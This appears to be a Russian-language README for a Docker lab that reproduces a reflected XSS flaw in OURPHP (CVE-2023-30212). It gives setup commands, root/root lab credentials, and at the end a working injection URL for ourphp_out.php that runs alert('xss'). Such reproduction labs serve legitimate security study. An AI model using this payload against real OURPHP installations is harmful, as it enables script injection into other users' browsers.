
Данный проект содержит необходимые файлы и Docker для воспроизведения XSS-уязвимости в OURPHP (CVE-2023-30212).
Здесь содержатся необходимые каталоги и Dockerfile для воспроизведения уязвимости в OURPHP, которая представляет собой XSS-уязвимость (CVE-2023-30212).
ПРЕДВАРИТЕЛЬНЫЕ ТРЕБОВАНИЯ
Скачайте Docker
sudo apt install -y docker.io
Скачайте файлы из этого репозитория с помощью git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
Здесь содержатся необходимые каталоги и dockerfile для воспроизведения сценария.
После загрузки файлов, создайте docker-образ с помощью
sudo docker build -t <Give_Suitable_Docker_name> . .
! Дайте имя Docker-образу, чтобы к нему можно было обратиться позже.
Преобразуйте Docker-образ в контейнер, используя
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! Здесь порт контейнера привязан к порту 80.
Чтобы увидеть статус docker-контейнера ,
sudo docker ps
После выполнения этих шагов,
Введите localhost и настройте OURPHP, используя следующие учётные данные. Имя пользователя : root Пароль : root Имя базы данных: data
Теперь вам нужно настроить имя пользователя и пароль для административной панели. Установите следующее: Имя пользователя: root Пароль: root и продолжите
Итак, наша полезная нагрузка
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
добавьте это вместе с localhost или 127.0.0.1, чтобы запустить XSS.